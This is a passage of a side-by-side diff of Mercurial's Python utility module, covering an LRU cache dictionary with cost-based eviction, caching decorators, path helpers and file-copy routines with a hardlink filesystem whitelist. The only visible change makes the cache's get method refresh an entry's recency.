1154 """copy-on-write sortdict
1154 """copy-on-write sortdict
1155
1155
1156 Be sure to call d = d.preparewrite() before writing to d.
1156 Be sure to call d = d.preparewrite() before writing to d.
1157 """
1157 """
1158
1158
1159 class transactional(object):
1159 class transactional(object):
1160 """Base class for making a transactional type into a context manager."""
1160 """Base class for making a transactional type into a context manager."""
1161 __metaclass__ = abc.ABCMeta
1161 __metaclass__ = abc.ABCMeta
1162
1162
1163 @abc.abstractmethod
1163 @abc.abstractmethod
1164 def close(self):
1164 def close(self):
1165 """Successfully closes the transaction."""
1165 """Successfully closes the transaction."""
1166
1166
1167 @abc.abstractmethod
1167 @abc.abstractmethod
1168 def release(self):
1168 def release(self):
1169 """Marks the end of the transaction.
1169 """Marks the end of the transaction.
1170
1170
1171 If the transaction has not been closed, it will be aborted.
1171 If the transaction has not been closed, it will be aborted.
1172 """
1172 """
1173
1173
1174 def __enter__(self):
1174 def __enter__(self):
1175 return self
1175 return self
1176
1176
1177 def __exit__(self, exc_type, exc_val, exc_tb):
1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 try:
1178 try:
1179 if exc_type is None:
1179 if exc_type is None:
1180 self.close()
1180 self.close()
1181 finally:
1181 finally:
1182 self.release()
1182 self.release()
1183
1183
1184 @contextlib.contextmanager
1184 @contextlib.contextmanager
1185 def acceptintervention(tr=None):
1185 def acceptintervention(tr=None):
1186 """A context manager that closes the transaction on InterventionRequired
1186 """A context manager that closes the transaction on InterventionRequired
1187
1187
1188 If no transaction was provided, this simply runs the body and returns
1188 If no transaction was provided, this simply runs the body and returns
1189 """
1189 """
1190 if not tr:
1190 if not tr:
1191 yield
1191 yield
1192 return
1192 return
1193 try:
1193 try:
1194 yield
1194 yield
1195 tr.close()
1195 tr.close()
1196 except error.InterventionRequired:
1196 except error.InterventionRequired:
1197 tr.close()
1197 tr.close()
1198 raise
1198 raise
1199 finally:
1199 finally:
1200 tr.release()
1200 tr.release()
1201
1201
1202 @contextlib.contextmanager
1202 @contextlib.contextmanager
1203 def nullcontextmanager():
1203 def nullcontextmanager():
1204 yield
1204 yield
1205
1205
1206 class _lrucachenode(object):
1206 class _lrucachenode(object):
1207 """A node in a doubly linked list.
1207 """A node in a doubly linked list.
1208
1208
1209 Holds a reference to nodes on either side as well as a key-value
1209 Holds a reference to nodes on either side as well as a key-value
1210 pair for the dictionary entry.
1210 pair for the dictionary entry.
1211 """
1211 """
1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213
1213
1214 def __init__(self):
1214 def __init__(self):
1215 self.next = None
1215 self.next = None
1216 self.prev = None
1216 self.prev = None
1217
1217
1218 self.key = _notset
1218 self.key = _notset
1219 self.value = None
1219 self.value = None
1220 self.cost = 0
1220 self.cost = 0
1221
1221
1222 def markempty(self):
1222 def markempty(self):
1223 """Mark the node as emptied."""
1223 """Mark the node as emptied."""
1224 self.key = _notset
1224 self.key = _notset
1225 self.value = None
1225 self.value = None
1226 self.cost = 0
1226 self.cost = 0
1227
1227
1228 class lrucachedict(object):
1228 class lrucachedict(object):
1229 """Dict that caches most recent accesses and sets.
1229 """Dict that caches most recent accesses and sets.
1230
1230
1231 The dict consists of an actual backing dict - indexed by original
1231 The dict consists of an actual backing dict - indexed by original
1232 key - and a doubly linked circular list defining the order of entries in
1232 key - and a doubly linked circular list defining the order of entries in
1233 the cache.
1233 the cache.
1234
1234
1235 The head node is the newest entry in the cache. If the cache is full,
1235 The head node is the newest entry in the cache. If the cache is full,
1236 we recycle head.prev and make it the new head. Cache accesses result in
1236 we recycle head.prev and make it the new head. Cache accesses result in
1237 the node being moved to before the existing head and being marked as the
1237 the node being moved to before the existing head and being marked as the
1238 new head node.
1238 new head node.
1239
1239
1240 Items in the cache can be inserted with an optional "cost" value. This is
1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 simply an integer that is specified by the caller. The cache can be queried
1241 simply an integer that is specified by the caller. The cache can be queried
1242 for the total cost of all items presently in the cache.
1242 for the total cost of all items presently in the cache.
1243
1243
1244 The cache can also define a maximum cost. If a cache insertion would
1244 The cache can also define a maximum cost. If a cache insertion would
1245 cause the total cost of the cache to go beyond the maximum cost limit,
1245 cause the total cost of the cache to go beyond the maximum cost limit,
1246 nodes will be evicted to make room for the new code. This can be used
1246 nodes will be evicted to make room for the new code. This can be used
1247 to e.g. set a max memory limit and associate an estimated bytes size
1247 to e.g. set a max memory limit and associate an estimated bytes size
1248 cost to each item in the cache. By default, no maximum cost is enforced.
1248 cost to each item in the cache. By default, no maximum cost is enforced.
1249 """
1249 """
1250 def __init__(self, max, maxcost=0):
1250 def __init__(self, max, maxcost=0):
1251 self._cache = {}
1251 self._cache = {}
1252
1252
1253 self._head = head = _lrucachenode()
1253 self._head = head = _lrucachenode()
1254 head.prev = head
1254 head.prev = head
1255 head.next = head
1255 head.next = head
1256 self._size = 1
1256 self._size = 1
1257 self.capacity = max
1257 self.capacity = max
1258 self.totalcost = 0
1258 self.totalcost = 0
1259 self.maxcost = maxcost
1259 self.maxcost = maxcost
1260
1260
1261 def __len__(self):
1261 def __len__(self):
1262 return len(self._cache)
1262 return len(self._cache)
1263
1263
1264 def __contains__(self, k):
1264 def __contains__(self, k):
1265 return k in self._cache
1265 return k in self._cache
1266
1266
1267 def __iter__(self):
1267 def __iter__(self):
1268 # We don't have to iterate in cache order, but why not.
1268 # We don't have to iterate in cache order, but why not.
1269 n = self._head
1269 n = self._head
1270 for i in range(len(self._cache)):
1270 for i in range(len(self._cache)):
1271 yield n.key
1271 yield n.key
1272 n = n.next
1272 n = n.next
1273
1273
1274 def __getitem__(self, k):
1274 def __getitem__(self, k):
1275 node = self._cache[k]
1275 node = self._cache[k]
1276 self._movetohead(node)
1276 self._movetohead(node)
1277 return node.value
1277 return node.value
1278
1278
1279 def insert(self, k, v, cost=0):
1279 def insert(self, k, v, cost=0):
1280 """Insert a new item in the cache with optional cost value."""
1280 """Insert a new item in the cache with optional cost value."""
1281 node = self._cache.get(k)
1281 node = self._cache.get(k)
1282 # Replace existing value and mark as newest.
1282 # Replace existing value and mark as newest.
1283 if node is not None:
1283 if node is not None:
1284 self.totalcost -= node.cost
1284 self.totalcost -= node.cost
1285 node.value = v
1285 node.value = v
1286 node.cost = cost
1286 node.cost = cost
1287 self.totalcost += cost
1287 self.totalcost += cost
1288 self._movetohead(node)
1288 self._movetohead(node)
1289
1289
1290 if self.maxcost:
1290 if self.maxcost:
1291 self._enforcecostlimit()
1291 self._enforcecostlimit()
1292
1292
1293 return
1293 return
1294
1294
1295 if self._size < self.capacity:
1295 if self._size < self.capacity:
1296 node = self._addcapacity()
1296 node = self._addcapacity()
1297 else:
1297 else:
1298 # Grab the last/oldest item.
1298 # Grab the last/oldest item.
1299 node = self._head.prev
1299 node = self._head.prev
1300
1300
1301 # At capacity. Kill the old entry.
1301 # At capacity. Kill the old entry.
1302 if node.key is not _notset:
1302 if node.key is not _notset:
1303 self.totalcost -= node.cost
1303 self.totalcost -= node.cost
1304 del self._cache[node.key]
1304 del self._cache[node.key]
1305
1305
1306 node.key = k
1306 node.key = k
1307 node.value = v
1307 node.value = v
1308 node.cost = cost
1308 node.cost = cost
1309 self.totalcost += cost
1309 self.totalcost += cost
1310 self._cache[k] = node
1310 self._cache[k] = node
1311 # And mark it as newest entry. No need to adjust order since it
1311 # And mark it as newest entry. No need to adjust order since it
1312 # is already self._head.prev.
1312 # is already self._head.prev.
1313 self._head = node
1313 self._head = node
1314
1314
1315 if self.maxcost:
1315 if self.maxcost:
1316 self._enforcecostlimit()
1316 self._enforcecostlimit()
1317
1317
1318 def __setitem__(self, k, v):
1318 def __setitem__(self, k, v):
1319 self.insert(k, v)
1319 self.insert(k, v)
1320
1320
1321 def __delitem__(self, k):
1321 def __delitem__(self, k):
1322 node = self._cache.pop(k)
1322 node = self._cache.pop(k)
1323 self.totalcost -= node.cost
1323 self.totalcost -= node.cost
1324 node.markempty()
1324 node.markempty()
1325
1325
1326 # Temporarily mark as newest item before re-adjusting head to make
1326 # Temporarily mark as newest item before re-adjusting head to make
1327 # this node the oldest item.
1327 # this node the oldest item.
1328 self._movetohead(node)
1328 self._movetohead(node)
1329 self._head = node.next
1329 self._head = node.next
1330
1330
1331 # Additional dict methods.
1331 # Additional dict methods.
1332
1332
1333 def get(self, k, default=None):
1333 def get(self, k, default=None):
1334 try:
1334 try:
1335 return self._cache[k].value
1335 return self.__getitem__(k)
1336 except KeyError:
1336 except KeyError:
1337 return default
1337 return default
1338
1338
1339 def clear(self):
1339 def clear(self):
1340 n = self._head
1340 n = self._head
1341 while n.key is not _notset:
1341 while n.key is not _notset:
1342 self.totalcost -= n.cost
1342 self.totalcost -= n.cost
1343 n.markempty()
1343 n.markempty()
1344 n = n.next
1344 n = n.next
1345
1345
1346 self._cache.clear()
1346 self._cache.clear()
1347
1347
1348 def copy(self, capacity=None, maxcost=0):
1348 def copy(self, capacity=None, maxcost=0):
1349 """Create a new cache as a copy of the current one.
1349 """Create a new cache as a copy of the current one.
1350
1350
1351 By default, the new cache has the same capacity as the existing one.
1351 By default, the new cache has the same capacity as the existing one.
1352 But, the cache capacity can be changed as part of performing the
1352 But, the cache capacity can be changed as part of performing the
1353 copy.
1353 copy.
1354
1354
1355 Items in the copy have an insertion/access order matching this
1355 Items in the copy have an insertion/access order matching this
1356 instance.
1356 instance.
1357 """
1357 """
1358
1358
1359 capacity = capacity or self.capacity
1359 capacity = capacity or self.capacity
1360 maxcost = maxcost or self.maxcost
1360 maxcost = maxcost or self.maxcost
1361 result = lrucachedict(capacity, maxcost=maxcost)
1361 result = lrucachedict(capacity, maxcost=maxcost)
1362
1362
1363 # We copy entries by iterating in oldest-to-newest order so the copy
1363 # We copy entries by iterating in oldest-to-newest order so the copy
1364 # has the correct ordering.
1364 # has the correct ordering.
1365
1365
1366 # Find the first non-empty entry.
1366 # Find the first non-empty entry.
1367 n = self._head.prev
1367 n = self._head.prev
1368 while n.key is _notset and n is not self._head:
1368 while n.key is _notset and n is not self._head:
1369 n = n.prev
1369 n = n.prev
1370
1370
1371 # We could potentially skip the first N items when decreasing capacity.
1371 # We could potentially skip the first N items when decreasing capacity.
1372 # But let's keep it simple unless it is a performance problem.
1372 # But let's keep it simple unless it is a performance problem.
1373 for i in range(len(self._cache)):
1373 for i in range(len(self._cache)):
1374 result.insert(n.key, n.value, cost=n.cost)
1374 result.insert(n.key, n.value, cost=n.cost)
1375 n = n.prev
1375 n = n.prev
1376
1376
1377 return result
1377 return result
1378
1378
1379 def popoldest(self):
1379 def popoldest(self):
1380 """Remove the oldest item from the cache.
1380 """Remove the oldest item from the cache.
1381
1381
1382 Returns the (key, value) describing the removed cache entry.
1382 Returns the (key, value) describing the removed cache entry.
1383 """
1383 """
1384 if not self._cache:
1384 if not self._cache:
1385 return
1385 return
1386
1386
1387 # Walk the linked list backwards starting at tail node until we hit
1387 # Walk the linked list backwards starting at tail node until we hit
1388 # a non-empty node.
1388 # a non-empty node.
1389 n = self._head.prev
1389 n = self._head.prev
1390 while n.key is _notset:
1390 while n.key is _notset:
1391 n = n.prev
1391 n = n.prev
1392
1392
1393 key, value = n.key, n.value
1393 key, value = n.key, n.value
1394
1394
1395 # And remove it from the cache and mark it as empty.
1395 # And remove it from the cache and mark it as empty.
1396 del self._cache[n.key]
1396 del self._cache[n.key]
1397 self.totalcost -= n.cost
1397 self.totalcost -= n.cost
1398 n.markempty()
1398 n.markempty()
1399
1399
1400 return key, value
1400 return key, value
1401
1401
1402 def _movetohead(self, node):
1402 def _movetohead(self, node):
1403 """Mark a node as the newest, making it the new head.
1403 """Mark a node as the newest, making it the new head.
1404
1404
1405 When a node is accessed, it becomes the freshest entry in the LRU
1405 When a node is accessed, it becomes the freshest entry in the LRU
1406 list, which is denoted by self._head.
1406 list, which is denoted by self._head.
1407
1407
1408 Visually, let's make ``N`` the new head node (* denotes head):
1408 Visually, let's make ``N`` the new head node (* denotes head):
1409
1409
1410 previous/oldest <-> head <-> next/next newest
1410 previous/oldest <-> head <-> next/next newest
1411
1411
1412 ----<->--- A* ---<->-----
1412 ----<->--- A* ---<->-----
1413 | |
1413 | |
1414 E <-> D <-> N <-> C <-> B
1414 E <-> D <-> N <-> C <-> B
1415
1415
1416 To:
1416 To:
1417
1417
1418 ----<->--- N* ---<->-----
1418 ----<->--- N* ---<->-----
1419 | |
1419 | |
1420 E <-> D <-> C <-> B <-> A
1420 E <-> D <-> C <-> B <-> A
1421
1421
1422 This requires the following moves:
1422 This requires the following moves:
1423
1423
1424 C.next = D (node.prev.next = node.next)
1424 C.next = D (node.prev.next = node.next)
1425 D.prev = C (node.next.prev = node.prev)
1425 D.prev = C (node.next.prev = node.prev)
1426 E.next = N (head.prev.next = node)
1426 E.next = N (head.prev.next = node)
1427 N.prev = E (node.prev = head.prev)
1427 N.prev = E (node.prev = head.prev)
1428 N.next = A (node.next = head)
1428 N.next = A (node.next = head)
1429 A.prev = N (head.prev = node)
1429 A.prev = N (head.prev = node)
1430 """
1430 """
1431 head = self._head
1431 head = self._head
1432 # C.next = D
1432 # C.next = D
1433 node.prev.next = node.next
1433 node.prev.next = node.next
1434 # D.prev = C
1434 # D.prev = C
1435 node.next.prev = node.prev
1435 node.next.prev = node.prev
1436 # N.prev = E
1436 # N.prev = E
1437 node.prev = head.prev
1437 node.prev = head.prev
1438 # N.next = A
1438 # N.next = A
1439 # It is tempting to do just "head" here, however if node is
1439 # It is tempting to do just "head" here, however if node is
1440 # adjacent to head, this will do bad things.
1440 # adjacent to head, this will do bad things.
1441 node.next = head.prev.next
1441 node.next = head.prev.next
1442 # E.next = N
1442 # E.next = N
1443 node.next.prev = node
1443 node.next.prev = node
1444 # A.prev = N
1444 # A.prev = N
1445 node.prev.next = node
1445 node.prev.next = node
1446
1446
1447 self._head = node
1447 self._head = node
1448
1448
1449 def _addcapacity(self):
1449 def _addcapacity(self):
1450 """Add a node to the circular linked list.
1450 """Add a node to the circular linked list.
1451
1451
1452 The new node is inserted before the head node.
1452 The new node is inserted before the head node.
1453 """
1453 """
1454 head = self._head
1454 head = self._head
1455 node = _lrucachenode()
1455 node = _lrucachenode()
1456 head.prev.next = node
1456 head.prev.next = node
1457 node.prev = head.prev
1457 node.prev = head.prev
1458 node.next = head
1458 node.next = head
1459 head.prev = node
1459 head.prev = node
1460 self._size += 1
1460 self._size += 1
1461 return node
1461 return node
1462
1462
1463 def _enforcecostlimit(self):
1463 def _enforcecostlimit(self):
1464 # This should run after an insertion. It should only be called if total
1464 # This should run after an insertion. It should only be called if total
1465 # cost limits are being enforced.
1465 # cost limits are being enforced.
1466 # The most recently inserted node is never evicted.
1466 # The most recently inserted node is never evicted.
1467 if len(self) <= 1 or self.totalcost <= self.maxcost:
1467 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 return
1468 return
1469
1469
1470 # This is logically equivalent to calling popoldest() until we
1470 # This is logically equivalent to calling popoldest() until we
1471 # free up enough cost. We don't do that since popoldest() needs
1471 # free up enough cost. We don't do that since popoldest() needs
1472 # to walk the linked list and doing this in a loop would be
1472 # to walk the linked list and doing this in a loop would be
1473 # quadratic. So we find the first non-empty node and then
1473 # quadratic. So we find the first non-empty node and then
1474 # walk nodes until we free up enough capacity.
1474 # walk nodes until we free up enough capacity.
1475 #
1475 #
1476 # If we only removed the minimum number of nodes to free enough
1476 # If we only removed the minimum number of nodes to free enough
1477 # cost at insert time, chances are high that the next insert would
1477 # cost at insert time, chances are high that the next insert would
1478 # also require pruning. This would effectively constitute quadratic
1478 # also require pruning. This would effectively constitute quadratic
1479 # behavior for insert-heavy workloads. To mitigate this, we set a
1479 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # target cost that is a percentage of the max cost. This will tend
1480 # target cost that is a percentage of the max cost. This will tend
1481 # to free more nodes when the high water mark is reached, which
1481 # to free more nodes when the high water mark is reached, which
1482 # lowers the chances of needing to prune on the subsequent insert.
1482 # lowers the chances of needing to prune on the subsequent insert.
1483 targetcost = int(self.maxcost * 0.75)
1483 targetcost = int(self.maxcost * 0.75)
1484
1484
1485 n = self._head.prev
1485 n = self._head.prev
1486 while n.key is _notset:
1486 while n.key is _notset:
1487 n = n.prev
1487 n = n.prev
1488
1488
1489 while len(self) > 1 and self.totalcost > targetcost:
1489 while len(self) > 1 and self.totalcost > targetcost:
1490 del self._cache[n.key]
1490 del self._cache[n.key]
1491 self.totalcost -= n.cost
1491 self.totalcost -= n.cost
1492 n.markempty()
1492 n.markempty()
1493 n = n.prev
1493 n = n.prev
1494
1494
1495 def lrucachefunc(func):
1495 def lrucachefunc(func):
1496 '''cache most recent results of function calls'''
1496 '''cache most recent results of function calls'''
1497 cache = {}
1497 cache = {}
1498 order = collections.deque()
1498 order = collections.deque()
1499 if func.__code__.co_argcount == 1:
1499 if func.__code__.co_argcount == 1:
1500 def f(arg):
1500 def f(arg):
1501 if arg not in cache:
1501 if arg not in cache:
1502 if len(cache) > 20:
1502 if len(cache) > 20:
1503 del cache[order.popleft()]
1503 del cache[order.popleft()]
1504 cache[arg] = func(arg)
1504 cache[arg] = func(arg)
1505 else:
1505 else:
1506 order.remove(arg)
1506 order.remove(arg)
1507 order.append(arg)
1507 order.append(arg)
1508 return cache[arg]
1508 return cache[arg]
1509 else:
1509 else:
1510 def f(*args):
1510 def f(*args):
1511 if args not in cache:
1511 if args not in cache:
1512 if len(cache) > 20:
1512 if len(cache) > 20:
1513 del cache[order.popleft()]
1513 del cache[order.popleft()]
1514 cache[args] = func(*args)
1514 cache[args] = func(*args)
1515 else:
1515 else:
1516 order.remove(args)
1516 order.remove(args)
1517 order.append(args)
1517 order.append(args)
1518 return cache[args]
1518 return cache[args]
1519
1519
1520 return f
1520 return f
1521
1521
1522 class propertycache(object):
1522 class propertycache(object):
1523 def __init__(self, func):
1523 def __init__(self, func):
1524 self.func = func
1524 self.func = func
1525 self.name = func.__name__
1525 self.name = func.__name__
1526 def __get__(self, obj, type=None):
1526 def __get__(self, obj, type=None):
1527 result = self.func(obj)
1527 result = self.func(obj)
1528 self.cachevalue(obj, result)
1528 self.cachevalue(obj, result)
1529 return result
1529 return result
1530
1530
1531 def cachevalue(self, obj, value):
1531 def cachevalue(self, obj, value):
1532 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1532 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1533 obj.__dict__[self.name] = value
1533 obj.__dict__[self.name] = value
1534
1534
1535 def clearcachedproperty(obj, prop):
1535 def clearcachedproperty(obj, prop):
1536 '''clear a cached property value, if one has been set'''
1536 '''clear a cached property value, if one has been set'''
1537 if prop in obj.__dict__:
1537 if prop in obj.__dict__:
1538 del obj.__dict__[prop]
1538 del obj.__dict__[prop]
1539
1539
1540 def increasingchunks(source, min=1024, max=65536):
1540 def increasingchunks(source, min=1024, max=65536):
1541 '''return no less than min bytes per chunk while data remains,
1541 '''return no less than min bytes per chunk while data remains,
1542 doubling min after each chunk until it reaches max'''
1542 doubling min after each chunk until it reaches max'''
1543 def log2(x):
1543 def log2(x):
1544 if not x:
1544 if not x:
1545 return 0
1545 return 0
1546 i = 0
1546 i = 0
1547 while x:
1547 while x:
1548 x >>= 1
1548 x >>= 1
1549 i += 1
1549 i += 1
1550 return i - 1
1550 return i - 1
1551
1551
1552 buf = []
1552 buf = []
1553 blen = 0
1553 blen = 0
1554 for chunk in source:
1554 for chunk in source:
1555 buf.append(chunk)
1555 buf.append(chunk)
1556 blen += len(chunk)
1556 blen += len(chunk)
1557 if blen >= min:
1557 if blen >= min:
1558 if min < max:
1558 if min < max:
1559 min = min << 1
1559 min = min << 1
1560 nmin = 1 << log2(blen)
1560 nmin = 1 << log2(blen)
1561 if nmin > min:
1561 if nmin > min:
1562 min = nmin
1562 min = nmin
1563 if min > max:
1563 if min > max:
1564 min = max
1564 min = max
1565 yield ''.join(buf)
1565 yield ''.join(buf)
1566 blen = 0
1566 blen = 0
1567 buf = []
1567 buf = []
1568 if buf:
1568 if buf:
1569 yield ''.join(buf)
1569 yield ''.join(buf)
1570
1570
1571 def always(fn):
1571 def always(fn):
1572 return True
1572 return True
1573
1573
1574 def never(fn):
1574 def never(fn):
1575 return False
1575 return False
1576
1576
1577 def nogc(func):
1577 def nogc(func):
1578 """disable garbage collector
1578 """disable garbage collector
1579
1579
1580 Python's garbage collector triggers a GC each time a certain number of
1580 Python's garbage collector triggers a GC each time a certain number of
1581 container objects (the number being defined by gc.get_threshold()) are
1581 container objects (the number being defined by gc.get_threshold()) are
1582 allocated even when marked not to be tracked by the collector. Tracking has
1582 allocated even when marked not to be tracked by the collector. Tracking has
1583 no effect on when GCs are triggered, only on what objects the GC looks
1583 no effect on when GCs are triggered, only on what objects the GC looks
1584 into. As a workaround, disable GC while building complex (huge)
1584 into. As a workaround, disable GC while building complex (huge)
1585 containers.
1585 containers.
1586
1586
1587 This garbage collector issue have been fixed in 2.7. But it still affect
1587 This garbage collector issue have been fixed in 2.7. But it still affect
1588 CPython's performance.
1588 CPython's performance.
1589 """
1589 """
1590 def wrapper(*args, **kwargs):
1590 def wrapper(*args, **kwargs):
1591 gcenabled = gc.isenabled()
1591 gcenabled = gc.isenabled()
1592 gc.disable()
1592 gc.disable()
1593 try:
1593 try:
1594 return func(*args, **kwargs)
1594 return func(*args, **kwargs)
1595 finally:
1595 finally:
1596 if gcenabled:
1596 if gcenabled:
1597 gc.enable()
1597 gc.enable()
1598 return wrapper
1598 return wrapper
1599
1599
1600 if pycompat.ispypy:
1600 if pycompat.ispypy:
1601 # PyPy runs slower with gc disabled
1601 # PyPy runs slower with gc disabled
1602 nogc = lambda x: x
1602 nogc = lambda x: x
1603
1603
1604 def pathto(root, n1, n2):
1604 def pathto(root, n1, n2):
1605 '''return the relative path from one place to another.
1605 '''return the relative path from one place to another.
1606 root should use os.sep to separate directories
1606 root should use os.sep to separate directories
1607 n1 should use os.sep to separate directories
1607 n1 should use os.sep to separate directories
1608 n2 should use "/" to separate directories
1608 n2 should use "/" to separate directories
1609 returns an os.sep-separated path.
1609 returns an os.sep-separated path.
1610
1610
1611 If n1 is a relative path, it's assumed it's
1611 If n1 is a relative path, it's assumed it's
1612 relative to root.
1612 relative to root.
1613 n2 should always be relative to root.
1613 n2 should always be relative to root.
1614 '''
1614 '''
1615 if not n1:
1615 if not n1:
1616 return localpath(n2)
1616 return localpath(n2)
1617 if os.path.isabs(n1):
1617 if os.path.isabs(n1):
1618 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1618 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1619 return os.path.join(root, localpath(n2))
1619 return os.path.join(root, localpath(n2))
1620 n2 = '/'.join((pconvert(root), n2))
1620 n2 = '/'.join((pconvert(root), n2))
1621 a, b = splitpath(n1), n2.split('/')
1621 a, b = splitpath(n1), n2.split('/')
1622 a.reverse()
1622 a.reverse()
1623 b.reverse()
1623 b.reverse()
1624 while a and b and a[-1] == b[-1]:
1624 while a and b and a[-1] == b[-1]:
1625 a.pop()
1625 a.pop()
1626 b.pop()
1626 b.pop()
1627 b.reverse()
1627 b.reverse()
1628 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1628 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1629
1629
1630 # the location of data files matching the source code
1630 # the location of data files matching the source code
1631 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1631 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1632 # executable version (py2exe) doesn't support __file__
1632 # executable version (py2exe) doesn't support __file__
1633 datapath = os.path.dirname(pycompat.sysexecutable)
1633 datapath = os.path.dirname(pycompat.sysexecutable)
1634 else:
1634 else:
1635 datapath = os.path.dirname(pycompat.fsencode(__file__))
1635 datapath = os.path.dirname(pycompat.fsencode(__file__))
1636
1636
1637 i18n.setdatapath(datapath)
1637 i18n.setdatapath(datapath)
1638
1638
1639 def checksignature(func):
1639 def checksignature(func):
1640 '''wrap a function with code to check for calling errors'''
1640 '''wrap a function with code to check for calling errors'''
1641 def check(*args, **kwargs):
1641 def check(*args, **kwargs):
1642 try:
1642 try:
1643 return func(*args, **kwargs)
1643 return func(*args, **kwargs)
1644 except TypeError:
1644 except TypeError:
1645 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1645 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1646 raise error.SignatureError
1646 raise error.SignatureError
1647 raise
1647 raise
1648
1648
1649 return check
1649 return check
1650
1650
1651 # a whilelist of known filesystems where hardlink works reliably
1651 # a whilelist of known filesystems where hardlink works reliably
1652 _hardlinkfswhitelist = {
1652 _hardlinkfswhitelist = {
1653 'apfs',
1653 'apfs',
1654 'btrfs',
1654 'btrfs',
1655 'ext2',
1655 'ext2',
1656 'ext3',
1656 'ext3',
1657 'ext4',
1657 'ext4',
1658 'hfs',
1658 'hfs',
1659 'jfs',
1659 'jfs',
1660 'NTFS',
1660 'NTFS',
1661 'reiserfs',
1661 'reiserfs',
1662 'tmpfs',
1662 'tmpfs',
1663 'ufs',
1663 'ufs',
1664 'xfs',
1664 'xfs',
1665 'zfs',
1665 'zfs',
1666 }
1666 }
1667
1667
1668 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1668 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1669 '''copy a file, preserving mode and optionally other stat info like
1669 '''copy a file, preserving mode and optionally other stat info like
1670 atime/mtime
1670 atime/mtime
1671
1671
1672 checkambig argument is used with filestat, and is useful only if
1672 checkambig argument is used with filestat, and is useful only if
1673 destination file is guarded by any lock (e.g. repo.lock or
1673 destination file is guarded by any lock (e.g. repo.lock or
1674 repo.wlock).
1674 repo.wlock).
1675
1675
1676 copystat and checkambig should be exclusive.
1676 copystat and checkambig should be exclusive.
1677 '''
1677 '''
1678 assert not (copystat and checkambig)
1678 assert not (copystat and checkambig)
1679 oldstat = None
1679 oldstat = None
1680 if os.path.lexists(dest):
1680 if os.path.lexists(dest):
1681 if checkambig:
1681 if checkambig:
1682 oldstat = checkambig and filestat.frompath(dest)
1682 oldstat = checkambig and filestat.frompath(dest)
1683 unlink(dest)
1683 unlink(dest)
1684 if hardlink:
1684 if hardlink:
1685 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1685 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1686 # unless we are confident that dest is on a whitelisted filesystem.
1686 # unless we are confident that dest is on a whitelisted filesystem.
1687 try:
1687 try:
1688 fstype = getfstype(os.path.dirname(dest))
1688 fstype = getfstype(os.path.dirname(dest))
1689 except OSError:
1689 except OSError:
1690 fstype = None
1690 fstype = None
1691 if fstype not in _hardlinkfswhitelist:
1691 if fstype not in _hardlinkfswhitelist:
1692 hardlink = False
1692 hardlink = False
1693 if hardlink:
1693 if hardlink:
1694 try:
1694 try:
1695 oslink(src, dest)
1695 oslink(src, dest)
1696 return
1696 return
1697 except (IOError, OSError):
1697 except (IOError, OSError):
1698 pass # fall back to normal copy
1698 pass # fall back to normal copy
1699 if os.path.islink(src):
1699 if os.path.islink(src):
1700 os.symlink(os.readlink(src), dest)
1700 os.symlink(os.readlink(src), dest)
1701 # copytime is ignored for symlinks, but in general copytime isn't needed
1701 # copytime is ignored for symlinks, but in general copytime isn't needed
1702 # for them anyway
1702 # for them anyway
1703 else:
1703 else:
1704 try:
1704 try:
1705 shutil.copyfile(src, dest)
1705 shutil.copyfile(src, dest)
1706 if copystat:
1706 if copystat:
1707 # copystat also copies mode
1707 # copystat also copies mode
1708 shutil.copystat(src, dest)
1708 shutil.copystat(src, dest)
1709 else:
1709 else:
1710 shutil.copymode(src, dest)
1710 shutil.copymode(src, dest)
1711 if oldstat and oldstat.stat:
1711 if oldstat and oldstat.stat:
1712 newstat = filestat.frompath(dest)
1712 newstat = filestat.frompath(dest)
1713 if newstat.isambig(oldstat):
1713 if newstat.isambig(oldstat):
1714 # stat of copied file is ambiguous to original one
1714 # stat of copied file is ambiguous to original one
1715 advanced = (
1715 advanced = (
1716 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1716 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1717 os.utime(dest, (advanced, advanced))
1717 os.utime(dest, (advanced, advanced))
1718 except shutil.Error as inst:
1718 except shutil.Error as inst:
1719 raise error.Abort(str(inst))
1719 raise error.Abort(str(inst))
1720
1720
1721 def copyfiles(src, dst, hardlink=None, progress=None):
1721 def copyfiles(src, dst, hardlink=None, progress=None):
1722 """Copy a directory tree using hardlinks if possible."""
1722 """Copy a directory tree using hardlinks if possible."""
1723 num = 0
1723 num = 0
1724
1724
1725 def settopic():
1725 def settopic():
1726 if progress:
1726 if progress:
1727 progress.topic = _('linking') if hardlink else _('copying')
1727 progress.topic = _('linking') if hardlink else _('copying')
1728
1728
1729 if os.path.isdir(src):
1729 if os.path.isdir(src):
1730 if hardlink is None:
1730 if hardlink is None:
1731 hardlink = (os.stat(src).st_dev ==
1731 hardlink = (os.stat(src).st_dev ==
1732 os.stat(os.path.dirname(dst)).st_dev)
1732 os.stat(os.path.dirname(dst)).st_dev)
1733 settopic()
1733 settopic()
1734 os.mkdir(dst)
1734 os.mkdir(dst)
1735 for name, kind in listdir(src):
1735 for name, kind in listdir(src):
1736 srcname = os.path.join(src, name)
1736 srcname = os.path.join(src, name)
1737 dstname = os.path.join(dst, name)
1737 dstname = os.path.join(dst, name)
1738 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1738 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1739 num += n
1739 num += n
1740 else:
1740 else:
1741 if hardlink is None:
1741 if hardlink is None:
